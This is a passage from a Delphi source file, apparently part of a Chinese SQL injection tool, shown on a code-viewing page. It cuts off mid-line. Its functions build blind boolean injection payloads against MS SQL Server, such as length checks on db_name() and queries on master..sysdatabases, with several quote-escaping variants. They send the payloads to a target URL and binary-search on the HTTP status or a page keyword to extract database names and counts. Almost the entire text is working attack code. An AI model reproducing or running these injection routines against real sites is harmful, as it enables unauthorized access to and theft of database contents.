📄 cjdatabase_unit.pas
字号:
end;
//******************************************************************************
//暴力破解的函数
function DBNamelenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
var
str_ext:string;
URL:string;
content:string;//页面内容
icode:integer; //responsecode
label start;
begin
//*****************
result:=false;
//case btype of
//1: begin
str_ext:=' and (select len(db_name()))<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
// end;
{2: begin
str_ext:=' and (select unicode(substring(db_name(),'+inttostr(iPos)+',1)))<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
end; }
//*****************
URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
start:
icode:=define_unit.GetURLCode(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
goto start;
end;
end;
end;
end;
//******************************************************************************
//暴力破解用的函数,获得用户字符串的长度
function GetDBNameCharLen(str_url:string;sContent:string):integer;
var
str_ext:string;
middle,min_num,max_num:integer;
i:integer;
begin
min_num:=1;
max_num:=32;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ;}
//***********************
//获取表的长度范围
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBNamelenA(middle,str_url,0,sContent,1) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
//循环得出表的字符长度
for i:=min_num+1 to max_num do
begin
if DBNamelenA(i,str_url,0,sContent,1) then
begin
result:=i-1;
break;
end;
end ;
end;
//******************************************************************************
//暴力破解用的函数
function DBNameCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
result:=0;
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBNamelenA(middle,URL,iPos,sContent,2) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num+1 to max_num do
begin
if DBNamelenA(i,URL,iPos,sContent,2) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//*****************************************************************************
function GetDBCount(URL:string;sContent:string):integer;
var
str_ext:string;
middle,i,min_num,max_num:integer;
begin
min_num:=1;
max_num:=128;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ; }
//***************************
//获取数据库个数范围
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,0,0,URL,sContent,1) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num+1 to max_num do
begin
if DBCountA(i,0,0,URL,sContent,1) then
begin
result:=i-1;
break;
end;
end;
end;
//*****************************************************************************
function DBCountA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer):boolean;
var
str_ext:string;
URL:string;
icode:integer;
content:string;
label start;
begin
//*****************
result:=false;
case btype of
1: begin
str_ext:=' and (select count(1) from [master]..[sysdatabases])<'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
2: begin
str_ext:=' and (Select top 1 len(name) from (Select top '+inttostr(iTop)+' dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
//Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end;
{3: begin
str_ext:=' and (Select top 1 unicode(substring(name,'+inttostr(iPos)+',1)) from (Select top '+inttostr(iTop)+' dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <'+inttostr(max_num);
case CJdatabase_unit.Inject_methord of
0 :
begin
Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
exit;
end;
1 :
URL:=str_ext;
2 :
URL:=''' '+str_ext+' and ''''=''';
3 :
URL:='%'' '+str_ext+' and ''%''=''';
end;
end; }
end;
//*****************
URL:=define_unit.SQLINJECTIONUrlToHex(URL,0);
if Form_main.CheckBox_keyword.Checked=true then
begin
content:=define_unit.GetURLContent(str_url+URL);
if pos(trim(Form_main.Edit_keyword.Text),content)>0 then
result:=true
else
result:=false;
end
else
begin
start:
icode:=define_unit.GetURLCode(str_url+URL);
if icode=200 then
result:=true
else
begin
if icode= 500 then
result:=false
else
begin
//sleep(1000);
goto start;
end;
end;
end;
end;
//*****************************************************************************
function GetDBCharLen(iTop,iPos:integer;str_url:string;sContent:string):integer;
var
min_num,max_num:integer;
middle,i:integer;
begin
min_num:=1;
max_num:=64;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ;}
//***************************
//获取数据库个数范围
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,iTop,iPos,str_url,sContent,2) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num+1 to max_num do
begin
if DBCountA(i,iTop,iPos,str_url,sContent,2) then
begin
result:=i-1;
break;
end;
end;
end;
//*****************************************************************************
//暴力破解用的函数
function DBCharLenB(min_num,max_num:integer;iTop,iPos:integer;URL:string;sContent:string):integer;
var
i:integer;
middle:integer;
begin
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if DBCountA(middle,iTop,iPos,URL,sContent,3) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
for i:=min_num+1 to max_num do
begin
if DBCountA(i,iTop,iPos,URL,sContent,3) then
begin
result:=i-1;
break;
end;
end ;
end;
//*****************************************************************************
//暴力破解用的函数
function ColumnA(max_num:integer;iTop:integer;iPos:integer;str_url:string;sContent:string;btype:integer;tableName:string):boolean;
var
str_ext:string;
URL:string;
content:string;
icode:integer;
label start;
begin
//*****************
result:=false;
case btype of
1: begin
str_ext:='%20and%20(select%20top%201%20len(name)%20from%20(%20select%20top%20'+intto⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -